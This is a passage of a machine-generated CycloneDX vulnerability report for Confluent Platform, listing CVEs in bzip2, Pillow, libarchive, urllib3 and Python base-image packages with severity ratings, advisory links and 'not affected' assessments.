          "ref": "urn:cdx:77b9b59b-ba56-4407-9025-4e050e2b6013/1#pkg:rpm/redhat/python3@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:06038188-97d8-41d2-9628-e010b37a600d/1#pkg:rpm/redhat/python-unversioned-command@3.9.25-7.el9_8.2?arch=noarch&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:06038188-97d8-41d2-9628-e010b37a600d/1#pkg:rpm/redhat/python3-libs@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:06038188-97d8-41d2-9628-e010b37a600d/1#pkg:rpm/redhat/python3@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:3ce4581c-161c-4dfa-9a98-040408b3c95f/1#pkg:rpm/redhat/python-unversioned-command@3.9.25-7.el9_8.2?arch=noarch&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:3ce4581c-161c-4dfa-9a98-040408b3c95f/1#pkg:rpm/redhat/python3-libs@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:3ce4581c-161c-4dfa-9a98-040408b3c95f/1#pkg:rpm/redhat/python3@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:ca231814-28ab-4573-b0f8-06ec09601e52/1#pkg:rpm/redhat/python-unversioned-command@3.9.25-7.el9_8.2?arch=noarch&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:ca231814-28ab-4573-b0f8-06ec09601e52/1#pkg:rpm/redhat/python3-libs@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:ca231814-28ab-4573-b0f8-06ec09601e52/1#pkg:rpm/redhat/python3@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:1080078b-bf88-4505-a133-1abe47582404/1#pkg:rpm/redhat/python-unversioned-command@3.9.25-7.el9_8.2?arch=noarch&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:1080078b-bf88-4505-a133-1abe47582404/1#pkg:rpm/redhat/python3-libs@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:1080078b-bf88-4505-a133-1abe47582404/1#pkg:rpm/redhat/python3@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "code_not_reachable",
        "response": [
          "update"
        ],
        "detail": "This issue is not exploitable in the Confluent Platform. This issue will be addressed in an upcoming quarterly patch release if an updated package is available from the vendor. The affected component is an operating-system base-image package that the product's application code does not use, so the vulnerable code path is not reachable."
      }
    },
    {
      "id": "CVE-2026-42250",
      "ratings": [
        {
          "source": {
            "name": "azure"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 5,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:L/AC:L/PR:L/UI:R/S:U/C:N/I:N/A:H"
        }
      ],
      "cwes": [
        787
      ],
      "description": "bzip2 contains an off\u2011by\u2011one error in the bzip2recover utility. When processing a specially crafted file, the application performs an out\u2011of\u2011bounds write to a global buffer, resulting in memory corruption and a crash (denial of service).\n\nThis issue was fixed in bzip2 patch\u00a035d122a3df8b0cc4082a4d89fdc6ee99f375fe67",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2026-42250"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2026-42250"
        },
        {
          "url": "https://cert.pl/en/posts/2026/05/CVE-2026-42250/"
        },
        {
          "url": "https://inbox.sourceware.org/bzip2-devel/20260528145407.293768-1-mark@klomp.org/"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-42250"
        },
        {
          "url": "https://sourceware.org/bzip2/"
        },
        {
          "url": "https://sourceware.org/cgit/bzip2/commit/?id=35d122a3df8b0cc4082a4d89fdc6ee99f375fe67"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2026-42250"
        }
      ],
      "published": "2026-05-28T14:16:19+00:00",
      "updated": "2026-06-17T10:47:34+00:00",
      "affects": [
        {
          "ref": "pkg:rpm/redhat/bzip2-libs@1.0.8-11.el9?arch=x86_64&distro=redhat-9.8",
          "versions": [
            {
              "version": "1.0.8-11.el9",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:e7727869-41af-4394-8d91-6b2282fd2848/1#pkg:rpm/redhat/bzip2-libs@1.0.8-11.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:ed7aa31f-d50e-485d-8785-b372e385755b/1#pkg:rpm/redhat/bzip2-libs@1.0.8-11.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:2e553233-b96a-4dc4-8633-d363380b776c/1#pkg:rpm/redhat/bzip2-libs@1.0.8-11.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:c3615eb2-749f-436d-a44e-bcf115907864/1#pkg:rpm/redhat/bzip2-libs@1.0.8-11.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:9b3395c8-2be5-4c05-b29f-c170109a08f7/1#pkg:rpm/redhat/bzip2-libs@1.0.8-11.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:36e98564-957e-4962-9b05-facbaffbff42/1#pkg:rpm/redhat/bzip2-libs@1.0.8-11.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:71662f85-b085-4d46-b740-ddd466e189cf/1#pkg:rpm/redhat/bzip2-libs@1.0.8-11.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:208a4c7b-c8cb-4983-94da-03702407d748/1#pkg:rpm/redhat/bzip2-libs@1.0.8-11.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:0b878cad-f5e5-4999-9206-674f9598fbff/1#pkg:rpm/redhat/bzip2-libs@1.0.8-11.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:20a5aa79-52f7-4ee6-93f2-1499f5c95713/1#pkg:rpm/redhat/bzip2-libs@1.0.8-11.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:9772fa70-e816-45d8-85c9-9bc3a8f94937/1#pkg:rpm/redhat/bzip2-libs@1.0.8-11.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:637aca81-8d20-432b-9228-ed0878cbc534/1#pkg:rpm/redhat/bzip2-libs@1.0.8-11.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:77b9b59b-ba56-4407-9025-4e050e2b6013/1#pkg:rpm/redhat/bzip2-libs@1.0.8-11.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:06038188-97d8-41d2-9628-e010b37a600d/1#pkg:rpm/redhat/bzip2-libs@1.0.8-11.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:3ce4581c-161c-4dfa-9a98-040408b3c95f/1#pkg:rpm/redhat/bzip2-libs@1.0.8-11.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:ca231814-28ab-4573-b0f8-06ec09601e52/1#pkg:rpm/redhat/bzip2-libs@1.0.8-11.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:1080078b-bf88-4505-a133-1abe47582404/1#pkg:rpm/redhat/bzip2-libs@1.0.8-11.el9?arch=x86_64&distro=redhat-9.8"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "code_not_reachable",
        "response": [
          "update"
        ],
        "detail": "This issue is not exploitable in the Confluent Platform. This issue will be addressed in an upcoming quarterly patch release if an updated package is available from the vendor. The affected component is an operating-system base-image package that the product's application code does not use, so the vulnerable code path is not reachable."
      }
    },
    {
      "id": "CVE-2026-42308",
      "ratings": [
        {
          "source": {
            "name": "amazon"
          },
          "severity": "high"
        },
        {
          "source": {
            "name": "ghsa"
          },
          "score": 5.5,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H"
        },
        {
          "source": {
            "name": "nvd"
          },
          "score": 5.5,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 6.2,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H"
        },
        {
          "source": {
            "name": "ubuntu"
          },
          "severity": "medium"
        }
      ],
      "cwes": [
        190
      ],
      "description": "Pillow is a Python imaging library. Prior to version 12.2.0, if a font advances for each glyph by an exceeding large amount, when Pillow keeps track of the current position, it may lead to an integer overflow. This issue has been patched in version 12.2.0.",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2026-42308"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2026-42308"
        },
        {
          "url": "https://github.com/pypa/advisory-database/tree/main/vulns/pillow/PYSEC-2026-165.yaml"
        },
        {
          "url": "https://github.com/python-pillow/Pillow"
        },
        {
          "url": "https://github.com/python-pillow/Pillow/pull/9518/changes%20%28suspected%20fix%29"
        },
        {
          "url": "https://github.com/python-pillow/Pillow/releases/tag/12.2.0"
        },
        {
          "url": "https://github.com/python-pillow/Pillow/security/advisories/GHSA-wjx4-4jcj-g98j"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-42308"
        },
        {
          "url": "https://ubuntu.com/security/notices/USN-8399-1"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2026-42308"
        }
      ],
      "published": "2026-05-09T06:16:09+00:00",
      "updated": "2026-07-24T21:10:00+00:00",
      "affects": [
        {
          "ref": "pkg:rpm/redhat/python-unversioned-command@3.9.25-7.el9_8.2?arch=noarch&distro=redhat-9.8",
          "versions": [
            {
              "version": "3.9.25-7.el9_8.2",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "pkg:rpm/redhat/python3-libs@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8",
          "versions": [
            {
              "version": "3.9.25-7.el9_8.2",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "pkg:rpm/redhat/python3@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8",
          "versions": [
            {
              "version": "3.9.25-7.el9_8.2",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:e7727869-41af-4394-8d91-6b2282fd2848/1#pkg:rpm/redhat/python-unversioned-command@3.9.25-7.el9_8.2?arch=noarch&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:e7727869-41af-4394-8d91-6b2282fd2848/1#pkg:rpm/redhat/python3-libs@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:e7727869-41af-4394-8d91-6b2282fd2848/1#pkg:rpm/redhat/python3@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:ed7aa31f-d50e-485d-8785-b372e385755b/1#pkg:rpm/redhat/python-unversioned-command@3.9.25-7.el9_8.2?arch=noarch&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:ed7aa31f-d50e-485d-8785-b372e385755b/1#pkg:rpm/redhat/python3-libs@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:ed7aa31f-d50e-485d-8785-b372e385755b/1#pkg:rpm/redhat/python3@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:2e553233-b96a-4dc4-8633-d363380b776c/1#pkg:rpm/redhat/python-unversioned-command@3.9.25-7.el9_8.2?arch=noarch&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:2e553233-b96a-4dc4-8633-d363380b776c/1#pkg:rpm/redhat/python3-libs@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:2e553233-b96a-4dc4-8633-d363380b776c/1#pkg:rpm/redhat/python3@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:c3615eb2-749f-436d-a44e-bcf115907864/1#pkg:rpm/redhat/python-unversioned-command@3.9.25-7.el9_8.2?arch=noarch&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:c3615eb2-749f-436d-a44e-bcf115907864/1#pkg:rpm/redhat/python3-libs@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:c3615eb2-749f-436d-a44e-bcf115907864/1#pkg:rpm/redhat/python3@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:9b3395c8-2be5-4c05-b29f-c170109a08f7/1#pkg:rpm/redhat/python-unversioned-command@3.9.25-7.el9_8.2?arch=noarch&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:9b3395c8-2be5-4c05-b29f-c170109a08f7/1#pkg:rpm/redhat/python3-libs@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:9b3395c8-2be5-4c05-b29f-c170109a08f7/1#pkg:rpm/redhat/python3@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:36e98564-957e-4962-9b05-facbaffbff42/1#pkg:rpm/redhat/python-unversioned-command@3.9.25-7.el9_8.2?arch=noarch&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:36e98564-957e-4962-9b05-facbaffbff42/1#pkg:rpm/redhat/python3-libs@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:36e98564-957e-4962-9b05-facbaffbff42/1#pkg:rpm/redhat/python3@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:71662f85-b085-4d46-b740-ddd466e189cf/1#pkg:rpm/redhat/python-unversioned-command@3.9.25-7.el9_8.2?arch=noarch&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:71662f85-b085-4d46-b740-ddd466e189cf/1#pkg:rpm/redhat/python3-libs@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:71662f85-b085-4d46-b740-ddd466e189cf/1#pkg:rpm/redhat/python3@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:208a4c7b-c8cb-4983-94da-03702407d748/1#pkg:rpm/redhat/python-unversioned-command@3.9.25-7.el9_8.2?arch=noarch&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:208a4c7b-c8cb-4983-94da-03702407d748/1#pkg:rpm/redhat/python3-libs@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:208a4c7b-c8cb-4983-94da-03702407d748/1#pkg:rpm/redhat/python3@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:0b878cad-f5e5-4999-9206-674f9598fbff/1#pkg:rpm/redhat/python-unversioned-command@3.9.25-7.el9_8.2?arch=noarch&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:0b878cad-f5e5-4999-9206-674f9598fbff/1#pkg:rpm/redhat/python3-libs@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:0b878cad-f5e5-4999-9206-674f9598fbff/1#pkg:rpm/redhat/python3@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:20a5aa79-52f7-4ee6-93f2-1499f5c95713/1#pkg:rpm/redhat/python-unversioned-command@3.9.25-7.el9_8.2?arch=noarch&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:20a5aa79-52f7-4ee6-93f2-1499f5c95713/1#pkg:rpm/redhat/python3-libs@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:20a5aa79-52f7-4ee6-93f2-1499f5c95713/1#pkg:rpm/redhat/python3@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:9772fa70-e816-45d8-85c9-9bc3a8f94937/1#pkg:rpm/redhat/python-unversioned-command@3.9.25-7.el9_8.2?arch=noarch&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:9772fa70-e816-45d8-85c9-9bc3a8f94937/1#pkg:rpm/redhat/python3-libs@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:9772fa70-e816-45d8-85c9-9bc3a8f94937/1#pkg:rpm/redhat/python3@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:637aca81-8d20-432b-9228-ed0878cbc534/1#pkg:rpm/redhat/python-unversioned-command@3.9.25-7.el9_8.2?arch=noarch&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:637aca81-8d20-432b-9228-ed0878cbc534/1#pkg:rpm/redhat/python3-libs@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:637aca81-8d20-432b-9228-ed0878cbc534/1#pkg:rpm/redhat/python3@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:77b9b59b-ba56-4407-9025-4e050e2b6013/1#pkg:rpm/redhat/python-unversioned-command@3.9.25-7.el9_8.2?arch=noarch&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:77b9b59b-ba56-4407-9025-4e050e2b6013/1#pkg:rpm/redhat/python3-libs@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:77b9b59b-ba56-4407-9025-4e050e2b6013/1#pkg:rpm/redhat/python3@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:06038188-97d8-41d2-9628-e010b37a600d/1#pkg:rpm/redhat/python-unversioned-command@3.9.25-7.el9_8.2?arch=noarch&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:06038188-97d8-41d2-9628-e010b37a600d/1#pkg:rpm/redhat/python3-libs@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:06038188-97d8-41d2-9628-e010b37a600d/1#pkg:rpm/redhat/python3@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:3ce4581c-161c-4dfa-9a98-040408b3c95f/1#pkg:rpm/redhat/python-unversioned-command@3.9.25-7.el9_8.2?arch=noarch&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:3ce4581c-161c-4dfa-9a98-040408b3c95f/1#pkg:rpm/redhat/python3-libs@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:3ce4581c-161c-4dfa-9a98-040408b3c95f/1#pkg:rpm/redhat/python3@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:ca231814-28ab-4573-b0f8-06ec09601e52/1#pkg:rpm/redhat/python-unversioned-command@3.9.25-7.el9_8.2?arch=noarch&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:ca231814-28ab-4573-b0f8-06ec09601e52/1#pkg:rpm/redhat/python3-libs@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:ca231814-28ab-4573-b0f8-06ec09601e52/1#pkg:rpm/redhat/python3@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:1080078b-bf88-4505-a133-1abe47582404/1#pkg:rpm/redhat/python-unversioned-command@3.9.25-7.el9_8.2?arch=noarch&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:1080078b-bf88-4505-a133-1abe47582404/1#pkg:rpm/redhat/python3-libs@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:1080078b-bf88-4505-a133-1abe47582404/1#pkg:rpm/redhat/python3@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "code_not_reachable",
        "response": [
          "update"
        ],
        "detail": "This issue is not exploitable in the Confluent Platform. This issue will be addressed in an upcoming quarterly patch release if an updated package is available from the vendor. The affected component is an operating-system base-image package that the product's application code does not use, so the vulnerable code path is not reachable."
      }
    },
    {
      "id": "CVE-2026-4426",
      "ratings": [
        {
          "source": {
            "name": "azure"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "photon"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 6.5,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H"
        },
        {
          "source": {
            "name": "ubuntu"
          },
          "severity": "medium"
        }
      ],
      "cwes": [
        1335
      ],
      "description": "A flaw was found in libarchive. An Undefined Behavior vulnerability exists in the zisofs decompression logic, caused by improper validation of a field (`pz_log2_bs`) read from ISO9660 Rock Ridge extensions. A remote attacker can exploit this by supplying a specially crafted ISO file. This can lead to incorrect memory allocation and potential application crashes, resulting in a denial-of-service (DoS) condition.",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2026-4426"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:8944"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2026-4426"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2449010"
        },
        {
          "url": "https://github.com/libarchive/libarchive/pull/2897"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-4426"
        },
        {
          "url": "https://ubuntu.com/security/notices/USN-8292-1"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2026-4426"
        }
      ],
      "published": "2026-03-19T15:16:28+00:00",
      "updated": "2026-06-17T10:56:33+00:00",
      "affects": [
        {
          "ref": "pkg:rpm/redhat/libarchive@3.5.3-9.el9_7?arch=x86_64&distro=redhat-9.8",
          "versions": [
            {
              "version": "3.5.3-9.el9_7",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:e7727869-41af-4394-8d91-6b2282fd2848/1#pkg:rpm/redhat/libarchive@3.5.3-9.el9_7?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:ed7aa31f-d50e-485d-8785-b372e385755b/1#pkg:rpm/redhat/libarchive@3.5.3-9.el9_7?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:2e553233-b96a-4dc4-8633-d363380b776c/1#pkg:rpm/redhat/libarchive@3.5.3-9.el9_7?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:c3615eb2-749f-436d-a44e-bcf115907864/1#pkg:rpm/redhat/libarchive@3.5.3-9.el9_7?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:9b3395c8-2be5-4c05-b29f-c170109a08f7/1#pkg:rpm/redhat/libarchive@3.5.3-9.el9_7?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:36e98564-957e-4962-9b05-facbaffbff42/1#pkg:rpm/redhat/libarchive@3.5.3-9.el9_7?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:71662f85-b085-4d46-b740-ddd466e189cf/1#pkg:rpm/redhat/libarchive@3.5.3-9.el9_7?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:208a4c7b-c8cb-4983-94da-03702407d748/1#pkg:rpm/redhat/libarchive@3.5.3-9.el9_7?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:0b878cad-f5e5-4999-9206-674f9598fbff/1#pkg:rpm/redhat/libarchive@3.5.3-9.el9_7?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:20a5aa79-52f7-4ee6-93f2-1499f5c95713/1#pkg:rpm/redhat/libarchive@3.5.3-9.el9_7?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:9772fa70-e816-45d8-85c9-9bc3a8f94937/1#pkg:rpm/redhat/libarchive@3.5.3-9.el9_7?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:637aca81-8d20-432b-9228-ed0878cbc534/1#pkg:rpm/redhat/libarchive@3.5.3-9.el9_7?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:77b9b59b-ba56-4407-9025-4e050e2b6013/1#pkg:rpm/redhat/libarchive@3.5.3-9.el9_7?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:06038188-97d8-41d2-9628-e010b37a600d/1#pkg:rpm/redhat/libarchive@3.5.3-9.el9_7?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:3ce4581c-161c-4dfa-9a98-040408b3c95f/1#pkg:rpm/redhat/libarchive@3.5.3-9.el9_7?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:ca231814-28ab-4573-b0f8-06ec09601e52/1#pkg:rpm/redhat/libarchive@3.5.3-9.el9_7?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:1080078b-bf88-4505-a133-1abe47582404/1#pkg:rpm/redhat/libarchive@3.5.3-9.el9_7?arch=x86_64&distro=redhat-9.8"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "code_not_reachable",
        "response": [
          "update"
        ],
        "detail": "This issue is not exploitable in the Confluent Platform. This issue will be addressed in an upcoming quarterly patch release if an updated package is available from the vendor. The affected component is an operating-system base-image package that the product's application code does not use, so the vulnerable code path is not reachable."
      }
    },
    {
      "id": "CVE-2026-44431",
      "source": {
        "name": "ghsa",
        "url": "https://github.com/advisories?query=type%3Areviewed+ecosystem%3Apip"
      },
      "ratings": [
        {
          "source": {
            "name": "alma"
          },
          "severity": "high"
        },
        {
          "source": {
            "name": "amazon"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "azure"
          },
          "severity": "high"
        },
        {
          "source": {
            "name": "ghsa"
          },
          "score": 5.3,
          "severity": "high",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N"
        },
        {
          "source": {
            "name": "nvd"
          },
          "score": 5.3,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N"
        },
        {
          "source": {
            "name": "oracle-oval"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 5.9,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N"
        },
        {
          "source": {
            "name": "rocky"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "ubuntu"
          },
          "severity": "medium"
        }
      ],
      "cwes": [
        200
      ],
      "description": "urllib3 is an HTTP client library for Python. From 1.23 to before 2.7.0, cross-origin redirects followed from the low-level API via ProxyManager.connection_from_url().urlopen(..., assert_same_host=False) still forward these sensitive headers. This vulnerability is fixed in 2.7.0.",
      "recommendation": "Upgrade urllib3 to version 2.7.0",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2026-44431"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:28159"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:36732"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2026-44431"
        },
        {
          "url": "https://bugzilla.redhat.com/2477154"
        },
        {
          "url": "https://bugzilla.redhat.com/2477167"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2477167"
        },
        {
          "url": "https://creativecommons.org/licenses/by/4.0/"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-44431"
        },
        {
          "url": "https://errata.almalinux.org/9/ALSA-2026-28159.html"
        },
        {
          "url": "https://errata.rockylinux.org/RLSA-2026:36732"
        },
        {
          "url": "https://github.com/urllib3/urllib3"
        },
        {
          "url": "https://github.com/urllib3/urllib3/security/advisories/GHSA-qccp-gfcp-xxvc"
        },
        {
          "url": "https://linux.oracle.com/cve/CVE-2026-44431.html"
        },
        {
          "url": "https://linux.oracle.com/errata/ELSA-2026-49927.html"
        },
        {
          "url": "https://lists.debian.org/debian-lts-announce/2026/06/msg00040.html"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-44431"
        },
        {
          "url": "https://ubuntu.com/security/notices/USN-8379-1"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2026-44431"
        }
      ],
      "published": "2026-05-13T16:16:57+00:00",
      "updated": "2026-06-26T12:16:32+00:00",
      "affects": [
        {
          "ref": "pkg:pypi/urllib3@2.6.3",
          "versions": [
            {
              "version": "2.6.3",
              "status": "affected"
            }
          ]
        },
        {
